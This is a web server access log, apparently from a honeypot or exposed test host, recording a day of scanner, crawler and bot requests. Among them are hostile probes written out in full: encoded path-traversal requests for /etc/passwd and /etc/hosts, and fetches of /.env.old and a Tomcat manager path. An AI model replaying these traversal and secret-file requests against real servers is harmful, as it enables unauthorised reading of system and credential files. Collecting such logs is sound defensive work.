===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:35832
Path: /.env.old
URL: /.env.old
Method: GET
[2026-03-28 11:06:03] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:35826
Path: /.DS_Store
URL: /.DS_Store
Method: GET
[2026-03-28 11:06:02] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Lkx-Apache2449TraversalPlugin/0.0.1 (+https://leakix.net/, +https://twitter.com/HaboubiAnis)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:35812
Path: /cgi-bin/../../../../../../../../../etc/hosts
URL: /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
Method: GET
[2026-03-28 11:06:02] === HTTP Request ===
[2026-03-28 11:06:01] Main page accessed - IP: 168.100.9.75:35804
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 168.100.9.75:35804
Path: /
URL: /
Method: GET
[2026-03-28 11:06:01] === HTTP Request ===
[2026-03-28 09:23:24] Main page accessed - IP: 172.30.0.12:54180
===================
X-Forwarded-For: 74.7.227.48
Via: 2.0 Caddy
From: gptbot(at)openai.com
X-Openai-Host-Hash: 867116608
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Accept-Encoding: gzip, br, deflate
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54180
Path: /
URL: /
Method: GET
[2026-03-28 09:23:24] === HTTP Request ===
[2026-03-28 09:14:16] Main page accessed - IP: 89.110.97.157:34306
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 89.110.97.157:34306
Path: /
URL: /
Method: GET
[2026-03-28 09:14:16] === HTTP Request ===
===================
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: google.com:443
RemoteAddr: 176.65.149.215:41030
Path:
URL: //google.com:443
Method: CONNECT
[2026-03-28 08:15:26] === HTTP Request ===
===================
Accept-Encoding: gzip
Connection: close
User-Agent: Mozilla/5.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 160.119.76.43:41936
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-03-28 07:50:35] === HTTP Request ===
===================
User-Agent: Mozilla/5.0
Accept-Encoding: gzip
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 160.119.76.43:41932
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-28 07:50:35] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 160.119.76.43:41924
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-28 07:50:35] === HTTP Request ===
[2026-03-28 07:50:35] Main page accessed - IP: 160.119.76.43:41922
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Accept-Encoding: gzip
Connection: close
Accept: text/html,application/xhtml+xml,*/*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 160.119.76.43:41922
Path: /
URL: /
Method: GET
[2026-03-28 07:50:35] === HTTP Request ===
[2026-03-28 07:30:07] Main page accessed - IP: 160.119.76.43:45636
===================
Connection: close
Accept: */*
User-Agent: Mozilla/5.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 160.119.76.43:45636
Path: /
URL: /
Method: GET
[2026-03-28 07:30:07] === HTTP Request ===
[2026-03-28 06:11:50] Main page accessed - IP: 198.235.24.243:61810
===================
Accept-Encoding: gzip
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 198.235.24.243:61810
Path: /
URL: /
Method: GET
[2026-03-28 06:11:50] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:53302
Path: /jars
URL: /jars
Method: GET
[2026-03-28 05:51:27] === HTTP Request ===
===================
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Language: en US,en;q=0.9,sv;q=0.8
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Accept-Encoding: gzip, deflate, gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 91.224.92.125:60648
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-03-28 05:45:25] === HTTP Request ===
===================
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
Cache-Control: no-cache
Proxy-Connection: Keep-Alive
Pragma: no-cache
Headers:
Protocol: HTTP/1.1
Host: www.shadowserver.org:443
RemoteAddr: 64.62.156.208:10259
Path:
URL: //www.shadowserver.org:443
Method: CONNECT
[2026-03-28 05:36:52] === HTTP Request ===
[2026-03-28 05:36:46] Main page accessed - IP: 64.62.156.202:44253
===================
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
Headers:
Protocol: HTTP/1.1
Host: api.ipify.org
RemoteAddr: 64.62.156.202:44253
Query: format=json
Path: /
URL: http://api.ipify.org/?format=json
Method: GET
[2026-03-28 05:36:46] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.62.156.207:3787
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-28 05:36:04] === HTTP Request ===
[2026-03-28 05:35:08] Main page accessed - IP: 64.62.156.202:14372
===================
Accept: */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.62.156.202:14372
Path: /
URL: /
Method: GET
[2026-03-28 05:35:08] === HTTP Request ===
[2026-03-28 03:20:24] Main page accessed - IP: 172.30.0.12:49338
===================
User-Agent: Mozilla/5.0 (Linux; arm_64; Android 12; CPH2205) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 YaBrowser/23.3.3.86.00 SA/3 Mobile Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 93.159.230.85
Via: 1.1 Caddy
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:49338
Path: /
URL: /
Method: GET
[2026-03-28 03:20:24] === HTTP Request ===
===================
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Accept-Language: en US,en;q=0.9,sv;q=0.8
X-Requested-With: XMLHttpRequest
Accept: */*
Accept-Encoding: gzip, deflate, gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.107:54690
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-03-28 02:05:02] === HTTP Request ===
[2026-03-27 23:43:08] Main page accessed - IP: 95.214.53.99:43320
===================
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 95.214.53.99:43320
Path: /
URL: /
Method: GET
[2026-03-27 23:43:08] === HTTP Request ===
[2026-03-27 23:17:48] Main page accessed - IP: 44.220.188.1:39198
===================
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/51.0.3013.95 Safari/537.32
Connection: keep-alive
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 44.220.188.1:39198
Path: /
URL: /
Method: GET
[2026-03-27 23:17:48] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:35438
Path: /jars
URL: /jars
Method: GET
[2026-03-27 22:23:38] === HTTP Request ===
[2026-03-27 22:13:24] Main page accessed - IP: 143.198.150.150:40258
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 143.198.150.150:40258
Path: /
URL: /
Method: GET
[2026-03-27 22:13:24] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.187.35.26:47354
Path: /../../../../../../etc/passwd
URL: /..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Method: GET
[2026-03-27 20:53:41] === HTTP Request ===
[2026-03-27 20:12:38] Main page accessed - IP: 198.235.24.123:53744
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 198.235.24.123:53744
Path: /
URL: /
Method: GET
[2026-03-27 20:12:38] === HTTP Request ===
[2026-03-27 19:49:21] Main page accessed - IP: 87.236.176.90:34713
===================
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 87.236.176.90:34713
Path: /
URL: /
Method: GET
[2026-03-27 19:49:21] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 66.132.172.133:60664
Path: *
URL: *
Method: PRI
[2026-03-27 16:51:06] === HTTP Request ===
[2026-03-27 16:51:05] Main page accessed - IP: 66.132.172.133:60660
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.172.133:60660
Path: /
URL: /
Method: GET
[2026-03-27 16:51:05] === HTTP Request ===
===================
Connection: keep-alive
Accept-Encoding: gzip, deflate, gzip, deflate
Accept-Language: en US,en;q=0.9,sv;q=0.8
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
X-Requested-With: XMLHttpRequest
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 91.224.92.125:54096
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-03-27 16:27:22] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Te: trailers
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Cache-Control: no-cache
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Sec-Gpc: 1
Dnt: 1
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 62.210.198.133:38264
Path: /favicon.ico/sellers.json
URL: /favicon.ico/sellers.json
Method: GET
[2026-03-27 14:44:46] === HTTP Request ===
===================
Cache-Control: no-cache
Dnt: 1
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Te: trailers
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Sec-Fetch-Site: cross-site
Sec-Gpc: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 62.210.198.133:38262
Path: /favicon.ico/app-ads.txt
URL: /favicon.ico/app-ads.txt
Method: GET
[2026-03-27 14:44:46] === HTTP Request ===
===================
Dnt: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Sec-Fetch-Site: cross-site
Sec-Gpc: 1
Cache-Control: no-cache
Sec-Fetch-Dest: script
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Te: trailers
Sec-Fetch-Mode: no-cors
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 62.210.198.133:38258
Path: /favicon.ico/ads.txt
URL: /favicon.ico/ads.txt
Method: GET
[2026-03-27 14:44:46] === HTTP Request ===
===================
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Sec-Gpc: 1
Cache-Control: no-cache
Accept-Language: en-US,en;q=0.9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Te: trailers
Sec-Fetch-Site: cross-site
Dnt: 1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 62.210.198.133:38252
Path: /login/favicon.ico
URL: /login/favicon.ico
Method: GET
[2026-03-27 14:44:45] === HTTP Request ===
===================
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/login
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 62.210.198.133:34427
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-27 14:44:41] === HTTP Request ===
[2026-03-27 14:44:41] Login page accessed - IP: 62.210.198.133:34427
===================
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 62.210.198.133:34427
Path: /login
URL: /login
Method: GET
[2026-03-27 14:44:41] === HTTP Request ===
===================
Referer: http://95.143.191.38:8081/
Accept: */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 62.210.198.133:34427
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-27 14:44:41] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 62.210.198.133:59717
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-27 14:44:41] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/
Accept: text/css,*/*;q=0.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 62.210.198.133:60067
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-03-27 14:44:41] === HTTP Request ===
[2026-03-27 14:44:41] Main page accessed - IP: 62.210.198.133:60067
===================
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Upgrade-Insecure-Requests: 1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 62.210.198.133:60067
Path: /
URL: /
Method: GET
[2026-03-27 14:44:41] === HTTP Request ===
[2026-03-27 14:44:39] Main page accessed - IP: 62.210.198.133:38246
===================
Accept: */*
User-Agent: curl/7.81.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 62.210.198.133:38246
Path: /
URL: /
Method: HEAD
[2026-03-27 14:44:39] === HTTP Request ===
===================
Te: trailers
Cache-Control: no-cache
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Sec-Fetch-Site: cross-site
Sec-Fetch-Dest: script
Sec-Gpc: 1
Dnt: 1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Sec-Fetch-Mode: no-cors
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 51.158.248.193:54252
Path: /favicon.ico/sellers.json
URL: /favicon.ico/sellers.json
Method: GET
[2026-03-27 14:43:41] === HTTP Request ===
===================
Connection: keep-alive
Accept-Encoding: gzip, deflate
Te: trailers
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Sec-Fetch-Site: cross-site
Sec-Gpc: 1
Cache-Control: no-cache
Dnt: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 51.158.248.193:54250
Path: /favicon.ico/app-ads.txt
URL: /favicon.ico/app-ads.txt
Method: GET
[2026-03-27 14:43:41] === HTTP Request ===
===================
Te: trailers
Sec-Gpc: 1
Dnt: 1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Cache-Control: no-cache
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 51.158.248.193:54246
Path: /favicon.ico/ads.txt
URL: /favicon.ico/ads.txt
Method: GET
[2026-03-27 14:43:41] === HTTP Request ===
===================
Te: trailers
Sec-Fetch-Site: cross-site
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Sec-Gpc: 1
Cache-Control: no-cache
Dnt: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 51.158.248.193:54242
Path: /login/favicon.ico
URL: /login/favicon.ico
Method: GET
[2026-03-27 14:43:40] === HTTP Request ===
===================
Referer: http://95.143.191.38:8081/login
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 51.158.248.193:53185
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-27 14:43:36] === HTTP Request ===
[2026-03-27 14:43:36] Login page accessed - IP: 51.158.248.193:53185
===================
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Upgrade-Insecure-Requests: 1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 51.158.248.193:53185
Path: /login
URL: /login
Method: GET
[2026-03-27 14:43:36] === HTTP Request ===
===================
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/
Accept: */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 51.158.248.193:53185
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-27 14:43:36] === HTTP Request ===
===================
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/
Accept: */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 51.158.248.193:56401
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-27 14:43:36] === HTTP Request ===
===================
Referer: http://95.143.191.38:8081/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 51.158.248.193:35803
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-03-27 14:43:36] === HTTP Request ===
[2026-03-27 14:43:35] Main page accessed - IP: 51.158.248.193:35803
===================
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 51.158.248.193:35803
Path: /
URL: /
Method: GET
[2026-03-27 14:43:35] === HTTP Request ===
[2026-03-27 14:43:34] Main page accessed - IP: 51.158.248.193:54228
===================
Accept: */*
User-Agent: curl/7.81.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 51.158.248.193:54228
Path: /
URL: /
Method: HEAD
[2026-03-27 14:43:34] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 zgrab/0.x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 130.131.161.76:48786
Path: /manager/text/list
URL: /manager/text/list
Method: GET
[2026-03-27 14:34:37] === HTTP Request ===
[2026-03-27 14:18:39] Main page accessed - IP: 104.236.88.138:45732
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 104.236.88.138:45732
Path: /
URL: /
Method: GET
[2026-03-27 14:18:39] === HTTP Request ===
[2026-03-27 13:31:41] Main page accessed - IP: 112.124.57.72:58272
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 112.124.57.72:58272
Path: /
URL: /
Method: GET
[2026-03-27 13:31:41] === HTTP Request ===
[2026-03-27 13:31:41] Main page accessed - IP: 112.124.57.72:58226
===================
Protocol: HTTP/1.0
Host:
RemoteAddr: 112.124.57.72:58226
Path: /
URL: /
Method: GET
[2026-03-27 13:31:41] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 112.124.57.72:57368
Path: /HNAP1
URL: /HNAP1
Method: GET
[2026-03-27 13:31:30] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 112.124.57.72:57342
Path: /evox/about
URL: /evox/about
Method: GET
[2026-03-27 13:31:30] === HTTP Request ===
[2026-03-27 13:31:30] Main page accessed - IP: 112.124.57.72:57354
===================
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; mcafee-epo-agent)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 112.124.57.72:57354
Path: /
URL: /
Method: GET
[2026-03-27 13:31:30] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 112.124.57.72:57290
Path: /nmaplowercheck1774618289
URL: /nmaplowercheck1774618289
Method: GET
[2026-03-27 13:31:29] === HTTP Request ===
===================
Body: <soap:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Header><operationID>00000001-00000001</operationID></soap:Header><soap:Body><RetrieveServiceContent xmlns="urn:internalvim25"><_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this></RetrieveServiceContent></soap:Body></soap:Envelope>
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Connection: close
Content-Length: 441
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 112.124.57.72:57286
Path: /sdk
URL: /sdk
Method: POST
[2026-03-27 13:31:29] === HTTP Request ===
[2026-03-27 13:31:29] Main page accessed - IP: 112.124.57.72:57298
===================
Protocol: HTTP/1.0
Host:
RemoteAddr: 112.124.57.72:57298
Path: /
URL: /
Method: GET
[2026-03-27 13:31:29] === HTTP Request ===
[2026-03-27 13:31:22] Main page accessed - IP: 112.124.57.72:56596
===================
Protocol: HTTP/1.0
